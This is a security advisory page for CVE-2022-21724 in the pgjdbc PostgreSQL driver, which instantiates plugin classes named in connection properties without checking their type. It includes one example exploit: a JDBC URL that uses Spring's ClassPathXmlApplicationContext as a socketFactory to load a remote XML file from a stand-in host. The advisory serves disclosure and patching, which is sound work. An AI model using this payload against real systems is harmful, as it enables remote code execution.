Ecosyste.ms: Advisories

Security Advisories: GSA_kwCzR0hTQS12N3dnLWNwd2MtMjRtNM0oEA

pgjdbc Does Not Check Class Instantiation when providing Plugin Classes

Impact

pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties.

However, the driver did not verify if the class implements the expected interface before instantiating the class.

Here's an example attack using an out-of-the-box class from Spring Framework:

DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");

The first impacted version is REL9.4.1208 (it introduced socketFactory connection property)

Permalink: https://github.com/advisories/GHSA-v7wg-cpwc-24m4
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12N3dnLWNwd2MtMjRtNM0oEA
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 2 years ago
Updated: about 1 year ago

CVSS Score: 7.0
CVSS vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Identifiers: GHSA-v7wg-cpwc-24m4, CVE-2022-21724
References:

• https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4
• https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813
• https://nvd.nist.gov/vuln/detail/CVE-2022-21724
• https://security.netapp.com/advisory/ntap-20220311-0005/
• https://lists.fedoraproject.org/archives/list/[email protected]/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS/
• https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html
• https://www.debian.org/security/2022/dsa-5196
• https://github.com/advisories/GHSA-v7wg-cpwc-24m4

Repository: https://github.com/pgjdbc/pgjdbc
Blast Radius: 36.7

Affected Packages